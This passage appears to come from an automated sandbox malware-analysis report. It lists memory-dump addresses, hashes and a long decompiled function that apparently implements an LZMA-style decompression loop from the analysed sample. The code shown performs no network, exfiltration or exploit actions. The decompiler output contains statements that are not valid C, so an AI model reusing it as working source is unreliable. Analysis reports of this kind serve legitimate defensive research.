                                                                                                                                                                            0x004066ef
                                                                                                                                                                            0x004066ef
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406935
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040693b
                                                                                                                                                                            0x0040693e
                                                                                                                                                                            0x00406941
                                                                                                                                                                            0x00406944
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406949
                                                                                                                                                                            0x0040694c
                                                                                                                                                                            0x0040694f
                                                                                                                                                                            0x00406952
                                                                                                                                                                            0x00406955
                                                                                                                                                                            0x00406958
                                                                                                                                                                            0x00406959
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695e
                                                                                                                                                                            0x00406961
                                                                                                                                                                            0x00406964
                                                                                                                                                                            0x00406967
                                                                                                                                                                            0x0040696a
                                                                                                                                                                            0x0040696e
                                                                                                                                                                            0x00406970
                                                                                                                                                                            0x00406973
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406975
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x00406973
                                                                                                                                                                            0x00406ba8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061d7
                                                                                                                                                                            0x00406bdf
                                                                                                                                                                            0x00406bdf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406bdf
                                                                                                                                                                            0x00406a2c
                                                                                                                                                                            0x004069b3
                                                                                                                                                                            0x004069b0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406705

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 83d4d9fa97144311a3e66a470cde7927608ab55fe6dc8c436fded4a10c430ead
                                                                                                                                                                            • Instruction ID: 2ec41c1936be718984cf19d05ce660ecedc56656b80368bbb2ce29215557a5c8
                                                                                                                                                                            • Opcode Fuzzy Hash: 83d4d9fa97144311a3e66a470cde7927608ab55fe6dc8c436fded4a10c430ead
                                                                                                                                                                            • Instruction Fuzzy Hash: 53712571E04228CBDF28CF98C854BADBBB1FB44305F15816ED856BB281C7785996DF44
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                            			E0040664D() {
                                                                                                                                                                            				unsigned short _t531;
                                                                                                                                                                            				signed int _t532;
                                                                                                                                                                            				void _t533;
                                                                                                                                                                            				signed int _t534;
                                                                                                                                                                            				signed int _t535;
                                                                                                                                                                            				signed int _t565;
                                                                                                                                                                            				signed int _t568;
                                                                                                                                                                            				signed int _t589;
                                                                                                                                                                            				signed int* _t606;
                                                                                                                                                                            				void* _t613;
                                                                                                                                                                            
                                                                                                                                                                            				L0:
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L0:
                                                                                                                                                                            					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                                            						 *(_t613 - 0x84) = 0xa;
                                                                                                                                                                            						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						 *(__ebp - 0x84) = 9;
                                                                                                                                                                            						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                            					}
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						 *(_t613 - 0x54) = _t606;
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							L133:
                                                                                                                                                                            							_t531 =  *_t606;
                                                                                                                                                                            							_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                            							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                            							if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                            								 *(_t613 - 0x40) = 1;
                                                                                                                                                                            								_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                            								 *_t606 = _t532;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								 *(_t613 - 0x10) = _t565;
                                                                                                                                                                            								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                            								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                            							}
                                                                                                                                                                            							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                            								goto L139;
                                                                                                                                                                            							}
                                                                                                                                                                            							L137:
                                                                                                                                                                            							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                            								 *(_t613 - 0x88) = 5;
                                                                                                                                                                            								L170:
                                                                                                                                                                            								_t568 = 0x22;
                                                                                                                                                                            								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                                            								_t535 = 0;
                                                                                                                                                                            								L172:
                                                                                                                                                                            								return _t535;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                            							L139:
                                                                                                                                                                            							_t533 =  *(_t613 - 0x84);
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								 *(_t613 - 0x88) = _t533;
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									L1:
                                                                                                                                                                            									_t534 =  *(_t613 - 0x88);
                                                                                                                                                                            									if(_t534 > 0x1c) {
                                                                                                                                                                            										break;
                                                                                                                                                                            									}
                                                                                                                                                                            									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BE7))) {
                                                                                                                                                                            										case 0:
                                                                                                                                                                            											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                            											_t534 =  *( *(_t613 - 0x70));
                                                                                                                                                                            											if(_t534 > 0xe1) {
                                                                                                                                                                            												goto L171;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t538 = _t534 & 0x000000ff;
                                                                                                                                                                            											_push(0x2d);
                                                                                                                                                                            											asm("cdq");
                                                                                                                                                                            											_pop(_t570);
                                                                                                                                                                            											_push(9);
                                                                                                                                                                            											_pop(_t571);
                                                                                                                                                                            											_t609 = _t538 / _t570;
                                                                                                                                                                            											_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                                            											asm("cdq");
                                                                                                                                                                            											_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                                            											 *(_t613 - 0x3c) = _t604;
                                                                                                                                                                            											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                                            											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                                            											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                                            											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                                            												L10:
                                                                                                                                                                            												if(_t612 == 0) {
                                                                                                                                                                            													L12:
                                                                                                                                                                            													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                            													goto L15;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L11;
                                                                                                                                                                            												}
                                                                                                                                                                            												do {
                                                                                                                                                                            													L11:
                                                                                                                                                                            													_t612 = _t612 - 1;
                                                                                                                                                                            													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                                            												} while (_t612 != 0);
                                                                                                                                                                            												goto L12;
                                                                                                                                                                            											}
                                                                                                                                                                            											if( *(_t613 - 4) != 0) {
                                                                                                                                                                            												GlobalFree( *(_t613 - 4)); // executed
                                                                                                                                                                            											}
                                                                                                                                                                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                            											 *(_t613 - 4) = _t534;
                                                                                                                                                                            											if(_t534 == 0) {
                                                                                                                                                                            												goto L171;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                                            												goto L10;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 1:
                                                                                                                                                                            											L13:
                                                                                                                                                                            											__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                            											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                            												 *(_t613 - 0x88) = 1;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                            											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                            											_t45 = _t613 - 0x48;
                                                                                                                                                                            											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                                            											__eflags =  *_t45;
                                                                                                                                                                            											L15:
                                                                                                                                                                            											if( *(_t613 - 0x48) < 4) {
                                                                                                                                                                            												goto L13;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t546 =  *(_t613 - 0x40);
                                                                                                                                                                            											if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                                                                            												L20:
                                                                                                                                                                            												 *(_t613 - 0x48) = 5;
                                                                                                                                                                            												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                            												goto L23;
                                                                                                                                                                            											}
                                                                                                                                                                            											 *(_t613 - 0x74) = _t546;
                                                                                                                                                                            											if( *(_t613 - 8) != 0) {
                                                                                                                                                                            												GlobalFree( *(_t613 - 8)); // executed
                                                                                                                                                                            											}
                                                                                                                                                                            											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                                                                            											 *(_t613 - 8) = _t534;
                                                                                                                                                                            											if(_t534 == 0) {
                                                                                                                                                                            												goto L171;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												goto L20;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 2:
                                                                                                                                                                            											L24:
                                                                                                                                                                            											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                                                                            											 *(_t613 - 0x84) = 6;
                                                                                                                                                                            											 *(_t613 - 0x4c) = _t553;
                                                                                                                                                                            											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                            											 *(_t613 - 0x54) = _t606;
                                                                                                                                                                            											goto L133;
                                                                                                                                                                            										case 3:
                                                                                                                                                                            											L21:
                                                                                                                                                                            											__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                            											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                            												 *(_t613 - 0x88) = 3;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                            											_t67 = _t613 - 0x70;
                                                                                                                                                                            											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                            											__eflags =  *_t67;
                                                                                                                                                                            											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                            											L23:
                                                                                                                                                                            											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                                                                            											if( *(_t613 - 0x48) != 0) {
                                                                                                                                                                            												goto L21;
                                                                                                                                                                            											}
                                                                                                                                                                            											goto L24;
                                                                                                                                                                            										case 4:
                                                                                                                                                                            											L133:
                                                                                                                                                                            											_t531 =  *_t606;
                                                                                                                                                                            											_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                            											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                            											if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                            												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                            												 *(_t613 - 0x40) = 1;
                                                                                                                                                                            												_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                            												 *_t606 = _t532;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *(_t613 - 0x10) = _t565;
                                                                                                                                                                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                            												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                            											}
                                                                                                                                                                            											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                            												goto L139;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 5:
                                                                                                                                                                            											goto L137;
                                                                                                                                                                            										case 6:
                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            												 *(__ebp - 0x34) = 1;
                                                                                                                                                                            												 *(__ebp - 0x84) = 7;
                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                            													goto L133;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                            											__esi =  *(__ebp - 0x60);
                                                                                                                                                                            											__cl = 8;
                                                                                                                                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                            											__ecx =  *(__ebp - 4);
                                                                                                                                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                            											if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                            													_t98 = __ebp - 0x38;
                                                                                                                                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                            													__eflags =  *_t98;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                            												}
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *(__ebp - 0x38) = 0;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                            											if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                            												__ebx = 1;
                                                                                                                                                                            												goto L61;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 8);
                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                            												__ebx = 1;
                                                                                                                                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            												goto L41;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 7:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                            											if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                                                                                                            												 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                            												__eax =  *(__ebp - 0x28);
                                                                                                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            												__al = __al & 0x000000fd;
                                                                                                                                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            												goto L69;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eax =  *(__ebp - 4);
                                                                                                                                                                            											__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            											 *(__ebp - 0x84) = 8;
                                                                                                                                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            											while(1) {
                                                                                                                                                                            												 *(_t613 - 0x54) = _t606;
                                                                                                                                                                            												goto L133;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 8:
                                                                                                                                                                            											goto L0;
                                                                                                                                                                            										case 9:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												goto L89;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eflags =  *(__ebp - 0x60);
                                                                                                                                                                            											if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                            												goto L171;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                            											__eflags = _t258;
                                                                                                                                                                            											0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                            											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                            											goto L75;
                                                                                                                                                                            										case 0xa:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            												 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                            													goto L133;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            											__eax =  *(__ebp - 0x28);
                                                                                                                                                                            											goto L88;
                                                                                                                                                                            										case 0xb:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												__ecx =  *(__ebp - 0x24);
                                                                                                                                                                            												__eax =  *(__ebp - 0x20);
                                                                                                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                            											} else {
                                                                                                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x28);
                                                                                                                                                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                            											L88:
                                                                                                                                                                            											__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                            											L89:
                                                                                                                                                                            											__eax =  *(__ebp - 4);
                                                                                                                                                                            											 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                            											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                            											goto L69;
                                                                                                                                                                            										case 0xc:
                                                                                                                                                                            											L99:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t334 = __ebp - 0x70;
                                                                                                                                                                            											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t334;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            											goto L101;
                                                                                                                                                                            										case 0xd:
                                                                                                                                                                            											L37:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            												 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											_t122 = __ebp - 0x70;
                                                                                                                                                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            											__eflags =  *_t122;
                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            											L39:
                                                                                                                                                                            											__eax =  *(__ebp - 0x40);
                                                                                                                                                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                            												goto L48;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eflags = __ebx - 0x100;
                                                                                                                                                                            											if(__ebx >= 0x100) {
                                                                                                                                                                            												goto L54;
                                                                                                                                                                            											}
                                                                                                                                                                            											L41:
                                                                                                                                                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                            											 *(__ebp - 0x48) = __eax;
                                                                                                                                                                            											__eax = __eax + 1;
                                                                                                                                                                            											__eax = __eax << 8;
                                                                                                                                                                            											__eax = __eax + __ebx;
                                                                                                                                                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            											__ax =  *__esi;
                                                                                                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            											__edx = __ax & 0x0000ffff;
                                                                                                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												__cx = __ax;
                                                                                                                                                                            												 *(__ebp - 0x40) = 1;
                                                                                                                                                                            												__cx = __ax >> 5;
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												__ebx = __ebx + __ebx + 1;
                                                                                                                                                                            												 *__esi = __ax;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            												0x800 = 0x800 - __edx;
                                                                                                                                                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                            												 *__esi = __cx;
                                                                                                                                                                            											}
